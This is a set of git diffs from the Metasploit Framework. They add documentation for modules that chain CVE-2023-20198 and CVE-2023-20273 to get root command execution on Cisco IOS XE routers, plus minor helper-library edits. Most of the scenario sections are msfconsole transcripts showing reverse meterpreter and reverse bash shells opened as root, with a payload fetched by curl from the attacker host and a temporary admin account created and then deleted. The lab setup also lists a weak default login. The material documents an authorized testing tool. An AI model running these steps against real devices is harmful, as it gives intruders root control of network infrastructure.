+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -1,0 +1,109 @@
+## Vulnerable Application
+This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
+devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.
+
+This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,
+CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read
+back via the webserver. Finally the output file is deleted and the admin user is removed.
+
+The vulnerable IOS XE versions are:
+
+16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+17.11.99SW
+
+## Testing
+This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
+
+* Acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+Or
+
+* Setup a virtualized environment.
+    * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
+      can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows)
+      to install GNS3 and the [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn
+      how GNS3 can be used.
+    * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
+    * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
+    * Create a new CSR1000V instance as a QEMU device.
+    * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, who's adapter is bridged
+      to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
+      be accessible to a remote attacker.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set CMD "id"`
+5. `run`
+
+## Scenarios
+
+```
+msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
+RHOST => 192.168.86.57
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
+CMD => id
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options
+
+Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):
+
+   Name                   Current Setting  Required  Description
+   ----                   ---------------  --------  -----------
+   CMD                    id               yes       The OS command to execute.
+   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands output file.
+   RHOSTS                 192.168.86.57    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                  443              yes       The target port (TCP)
+   SSL                    true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                                   no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
+[*] Running module against 192.168.86.57
+
+[*] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
+[*] Running module against 192.168.86.57
+
+[*] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) >  run CMD="cat /etc/release"
+[*] Running module against 192.168.86.57
+
+[*] # Needed for open-vm-tools
+# Copyright (c) 2016 by Cisco Systems, Inc., All rights reserved.
+DISTRIB_ID=Cisco
+DISTRIB_RELEASE=3.10.84
+DISTRIB_CODENAME=IOS-XE
+DISTRIB_DESCRIPTION="Monte Vista Linux"
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 
+```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -39,16 +39,29 @@ This module was tested against IOS XE version 16.12.3. To test this module you w
 Or
 
 * Setup a virtualized environment.
-    * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
-      can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows)
-      to install GNS3 and the [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn
-      how GNS3 can be used.
-    * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
-    * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
-    * Create a new CSR1000V instance as a QEMU device.
-    * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter is bridged
-      to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
-      be accessible to a remote attacker.
+  * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
+    can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
+    [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
+    [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
+  * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
+  * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
+  * Create a new CSR1000v instance as a QEMU device.
+  * The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
+    to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
+    be accessible to a remote attacker.
+  * When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
+    the device:
+    ```
+    Router>enable
+    Router#config
+    Router(config)#ip http server
+    router(config)#ip http secure-server
+    router(config)#ip http authentication local
+    router(config)#username admin privilege 15 secret qwerty
+    router(config)#exit
+    Router#copy running-config startup-config
+    ```
+  * You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
 
 ## Verification Steps
 1. Start msfconsole

--- a/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
+++ b/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
@@ -1,0 +1,398 @@
+## Vulnerable Application
+This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
+devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
+
+The vulnerable IOS XE versions are:
+16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+17.11.99SW
+
+## Testing
+This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
+
+* Acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+Or
+
+* Setup a virtualized environment.
+  * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
+    can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the 
+    [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
+    [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
+  * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
+  * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
+  * Create a new CSR1000v instance as a QEMU device.
+  * The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
+    to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
+    be accessible to a remote attacker.
+  * When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
+    the device:
+    ```
+    Router>enable
+    Router#config
+    Router(config)#ip http server
+    router(config)#ip http secure-server
+    router(config)#ip http authentication local
+    router(config)#username admin privilege 15 secret qwerty
+    router(config)#exit
+    Router#copy running-config startup-config
+    ```
+  * You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/linux/misc/cisco_ios_xe_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+6. `check`
+7. `exploit`
+
+## Options
+
+### CISCO_VRF_NAME
+We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
+'global' should work, but exposing this as an option will allow for usage in more complex network setups.
+A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
+inspect a devices configuration to see an appropriate VRF to use.
+
+### CISCO_CMD_TIMEOUT
+We may need to try and execute a command a second time if it fails the first time. This option is the maximum
+number of seconds to keep trying.
+
+## Scenarios
+To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
+This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
+
+### Linux Command (IOS XE 17.3.2)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOST 192.168.86.58
+RHOST => 192.168.86.58
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
+target => 0
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+[+] 192.168.86.58:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
+
+Module options (exploit/linux/misc/cisco_ios_xe_rce):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
+   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.58    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              443              yes       The target port (TCP)
+   SSL                true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      dDrTvTlqxwoK     no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
+[*] Removing user 'sqVXixoV'
+[*] Sending stage (3045380 bytes) to 192.168.86.58
+[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : router
+OS           :  (Linux 4.19.106)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
+payload => cmd/linux/http/x64/shell/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'pfGnCwkI' with password 'YhTwxBLK'
+[*] Removing user 'pfGnCwkI'
+[*] Sending stage (38 bytes) to 192.168.86.58
+[*] Command shell session 7 opened (192.168.86.42:4444 -> 192.168.86.58:64994) at 2023-11-06 17:01:44 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.58 - Command shell session 7 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```
+
+### Linux Command (IOS XE 16.12.3)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
+
+Module options (exploit/linux/misc/cisco_ios_xe_rce):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
+   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.59    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              443              yes       The target port (TCP)
+   SSL                true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ytfnShmfT        no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
+[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'lwWQIDaS' with password 'dADCGJpS'
+[*] Removing user 'lwWQIDaS'
+[*] Sending stage (3045380 bytes) to 192.168.86.59
+[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.59:56554) at 2023-11-06 16:41:06 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : router
+OS           :  (Linux 4.19.64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
+target => 0
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
+payload => cmd/linux/http/x64/shell/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'NjAmOioM' with password 'tOHjWGyw'
+[*] Removing user 'NjAmOioM'
+[*] Sending stage (38 bytes) to 192.168.86.59
+[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.59:56598) at 2023-11-06 16:44:48 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.59 - Command shell session 5 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```
+
+### Unix Target (IOS XE 17.3.2)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
+target => 1
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'JAonVuJS' with password 'vYecWhWk'
+[*] Removing user 'JAonVuJS'
+[*] Sending stage (24772 bytes) to 192.168.86.58
+[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.58:65016) at 2023-11-06 17:03:34 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : router
+OS           : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter >
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
+[*] Removing user 'TVtEhbdd'
+[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.58 - Command shell session 9 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```
+
+### Unix Target (IOS XE 16.12.3)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
+target => 1
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
+
+Module options (exploit/linux/misc/cisco_ios_xe_rce):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
+   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.59    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              443              yes       The target port (TCP)
+   SSL                true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
+[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'pJaWZBTl' with password 'KlcuLPaJ'
+[*] Removing user 'pJaWZBTl'
+[*] Sending stage (24772 bytes) to 192.168.86.59
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.59:56572) at 2023-11-06 16:42:36 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : router
+OS           : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > 
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'aZIYJugi' with password 'RziZqysr'
+[*] Removing user 'aZIYJugi'
+[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.59:56584) at 2023-11-06 16:43:30 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.59 - Command shell session 4 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -28,7 +28,7 @@ module Msf
         cmd = "exit\n" + cmd
       end
 
-      # As we place the cmd in CDATA, we cannot have hte closing tag in the command.
+      # As we place the cmd in CDATA, we cannot have the closing tag in the command.
       if cmd.include? ']]>'
         print_error("CLI command contain bad sequence ']]>'.")
         return nil

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -46,7 +46,7 @@ module Msf
       result = ''
 
       xml_doc.xpath('//Envelope/Body/response/resultEntry/text').each do |val1|
-        result << val1.content
+        result << val1.content.gsub(/^\*\*CLI Line # \d+: /, '')
       end
 
       result

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -1,8 +1,32 @@
 module Msf
   module Exploit::Remote::HTTP::CiscoIosXe
 
+    class Mode
+      USER_EXEC = :user # User EXEC
+      PRIVILEGED_EXEC = :privileged # Privileged EXEC
+      GLOBAL_CONFIGURATION = :global # Global Configuration
+
+      def self.to_mode(str)
